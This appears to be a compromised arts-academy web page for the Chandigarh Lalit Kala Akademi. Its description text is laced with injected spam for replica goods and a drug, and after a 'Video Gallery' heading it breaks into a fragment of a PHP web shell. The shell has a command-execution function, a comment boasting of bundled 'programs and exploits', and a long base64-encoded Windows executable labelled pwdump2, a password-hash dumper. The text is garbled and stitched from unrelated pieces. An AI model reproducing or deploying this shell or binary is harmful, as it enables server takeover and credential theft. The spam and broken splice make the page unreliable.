Chandigarh Lalit Kala Akademi State Academy Of Art
the Akademi
 

The first Prime Minister of independent India, Pt. Jawaharlal Nehru conceived and established a Escompte Sac Chanel Replique few major agencies of culture. The Lalit Kala Akademi is one of these agencies responsible for the development, preservation, promotion and dissemination of visual arts in the country. There is one National body known as Lalit Kala Akademi, Delhi and various State and Union Territory academies representing different states and Union Territories of India.

Chandigarh Lalit Kala Akademi represents the Union Territory of Chandigarh, capital of the states of Punjab and Haryana and focuses its activities in the field of visual arts such as Paintings, Drawing, Sculptures, Graphics, Photography, Ceramics, Installation Art and other Swiss Replica Watches arts allied to the field of fine arts. The Akademi is an autonomous organisation with its own constitution fully funded by the department of culture, Chandigarh Administration.buy arcoxia

Video Gallery

&1",'r'))) { return 126; } while (!feof($p)) { $line=fgets($p,1000); $out .= $line; } pclose($p); return $out; } }else{ function myshellexec($cmd) { global $disablefunc; $result = ''; if (!empty($cmd)) { if (is_callable('exec') and !in_array('exec',$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable('system') and !in_array('system',$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable('passthru') and !in_array('passthru',$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,'r'))) { $result = ''; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); } } return $result; } } } // all the base64-encoded crap comes next. they include programs and exploits, to better your hacking experience ;) $pwdump2="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAABe6Dg9GolWbhqJVm4aiVZu8pZdbhuJVm6ZlVhuF4lWbkOqRW4fiVZuGolX biGJVm7lqVxuG4lWbvKWXG4qiVZuUmljaBqJVm4AAAAAAAAAAFBFAABMAQMA7bzbOAAAAAAAAAAA 4AAPAQsBBgAAUAAAAEAAAAAAAABHHAAAABAAAABgAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAA AAAAAKAAAAAQAAAAAAAAAwAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAyGQAADwA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAADwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA LnRleHQAAAAESAAAABAAAABQAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAEAoAAABgAAAA EAAAAGAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAABghAAAAcAAAABAAAABwAAAAAAAAAAAAAAAA AABAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIPsDFNVVlcz 7Wh4cEAAiWwkFP8VEGBAAIvYO911Cl9eXTPAW4PEDMOLNVRgQABoXHBAAFP/1jvFo4R9QAB1Cl9e XTPAW4PEDMNoRHBAAFP/1jvFo4h9QAB1Cl9eXTPAW4PEDMO/0AcAAFdV6H8GAACL8IPECDv1dCyN RCQQUFdWagX/FYR9QAA9BAAAwHUggcfQBwAAV1boUwYAAIvwg8QIhfZ11F9eXTPAW4PEDMOL/mbH RCQUEgBmx0QkFhQAx0QkGDBwQACLRzyFwHQVjU84agGNVCQYUVL/FYh9QACFwHQRiwczyYXAD5TB A/iFyXTV6w6LTCQgi0dEvQEAAACJAVbouAUAAIPEBFP/FXRgQABfi8VeXVuDxAzDkJCQkItEJARQ aIBwQADo4gcAAIPECGoB6AMHAACQkJCQkJCQUYtEJAhTVoP4AlfHRCQMAAAAAHUci3QkGItGBFDo VgkAAIPEBIlEJAyFwHU9iw7rMIP4AXUljVQkDFLogP7//4PEBIXAdSNohHFAAOiABwAAg8QEagHo oQYAAItEJBiLCFHoef///4PEBOjxAAAAhcB0EmhMcUAAaKBzQADogAcAAIPECItUJAxSagBo/w8f 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 